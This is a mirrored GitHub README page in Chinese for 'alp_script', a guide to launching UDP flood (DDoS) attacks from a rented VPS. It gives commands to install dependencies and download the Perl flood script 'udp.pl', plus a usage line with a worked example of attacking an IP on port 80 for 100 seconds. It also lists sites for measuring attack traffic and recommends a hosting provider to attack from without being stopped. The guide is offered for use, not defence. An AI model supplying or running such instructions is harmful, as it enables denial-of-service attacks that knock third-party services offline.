Git Product home page Git Product logo

alp_script's Introduction

作者: Laowang

时间: 2019-10-12

分类: 默认分类

本机发包脚本使用方法说明.

登陆VPS,执行命令

CentOS:

yum update -y
yum install wget perl dstat -y
wget https://raw.githubusercontent.com/whunt1/ALP_Script/master/udp.pl

Debian & Ubuntu:

apt-get update -y
apt-get install wget perl dstat -y
wget https://raw.githubusercontent.com/whunt1/ALP_Script/master/udp.pl

执行命令:perl udp.pl IP port thread time(s).

如要攻击1.2.3.4,80端口攻击100秒

perl udp.pl 1.2.3.4 80 200 100

这里的200是线程,根据VPS网络性能自己决定.

监控网络状况可以输入 dstat 查看.

要查看打出多少流量,可以访问下面几个测量的墙.

测量网站

vedbex

ddosfilter

cyber-hub

toolsmania

dstat.live

dstat.cc

什么?不知道用那里的机器发包?

scaleway online旗下的 只要你别一直打 基本没事.

scaleway官网

标签: none

alp_script's People

Contributors

whunt1 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.